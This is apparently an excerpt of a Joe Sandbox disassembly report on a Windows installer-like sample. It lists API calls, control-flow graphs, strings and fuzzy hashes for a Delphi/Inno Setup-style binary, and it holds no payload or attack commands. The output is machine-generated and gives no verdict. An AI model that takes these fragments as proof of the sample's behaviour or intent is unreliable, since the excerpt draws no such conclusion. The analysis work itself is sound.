                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                          • String ID: t6B
                                                          • API String ID: 183575631-3178735703
                                                          • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                          • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                          • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                          • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D

                                                          Control-flow Graph

                                                          control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                          APIs
                                                          • GetProcAddress.KERNEL32(6F9D0000,SHGetFolderPathA), ref: 0047C75E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                          • API String ID: 190572456-2091577475
                                                          • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                          • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                          • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                          • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD

                                                          Control-flow Graph

                                                          control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                          • API String ID: 3256987805-3653653586
                                                          • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                          • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                          • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                          • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                          APIs
                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$Prop
                                                          • String ID: wA$yA
                                                          • API String ID: 3887896539-1847240991
                                                          • Opcode ID: 3727ce753c8f8498010a5226f695284cd865d9d8e6cc9e92a61234208361845c
                                                          • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                          • Opcode Fuzzy Hash: 3727ce753c8f8498010a5226f695284cd865d9d8e6cc9e92a61234208361845c
                                                          • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A

                                                          Control-flow Graph

                                                          control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 0042F587
                                                          • GetFocus.USER32 ref: 0042F58F
                                                          • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                          • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                          • String ID: TWindowDisabler-Window
                                                          • API String ID: 3167913817-1824977358
                                                          • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                          • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                          • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                          • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD

                                                          Control-flow Graph

                                                          control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                          • API String ID: 1646373207-2130885113
                                                          • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                          • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                          • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                          • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                          APIs
                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                            • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                            • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                          Strings
                                                          Similarity
                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                          • String ID: c:\directory$shell32.dll
                                                          • API String ID: 3376378930-1375355148
                                                          • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                          • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                          • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                          • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                          APIs
                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                          • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                          Strings
                                                          Similarity
                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                          • API String ID: 4130936913-2943970505
                                                          • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                          • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                          • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                          • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                            • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                            • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                            • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                            • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                          Strings
                                                          Similarity
                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                          • API String ID: 854858120-615399546
                                                          • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                          • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                          • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                          • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                          APIs
                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                          • OemToCharA.USER32(?,?), ref: 00423754
                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                          Strings
                                                          Similarity
                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                          • String ID: 2$MAINICON
                                                          • API String ID: 3935243913-3181700818
                                                          • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                          • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                          • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                          • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                            • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                            • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                            • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                            • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                            • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                            • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                            • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                            • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                            • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                            • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                          • API String ID: 3864787166-2767913252
                                                          • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                          • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                          • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                          • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                          APIs
                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                          Similarity
                                                          • API ID: LongWindow$Prop
                                                          • String ID:
                                                          • API String ID: 3887896539-0
                                                          • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                          • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                          • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                          • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                          • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                          • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                          Strings
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • String ID: p%G
                                                          • API String ID: 2066263336-2885399958
                                                          • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                          • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                          • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                          • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                          Strings
                                                          • WININIT.INI, xrefs: 004557B8
                                                          • PendingFileRenameOperations2, xrefs: 00455758
                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                          • PendingFileRenameOperations, xrefs: 00455728
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                          • API String ID: 47109696-2199428270
                                                          • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                          • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                          • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                          • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                          • API String ID: 1375471231-2952887711
                                                          • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                          • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                          • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                          • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                          APIs
                                                          • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                          • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                          • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$EnumLongWindows
                                                          • String ID: TAB
                                                          • API String ID: 4191631535-3846439302
                                                          • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                          • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                          • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                          • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                          APIs
                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                          Strings
                                                          Memory Dump Source
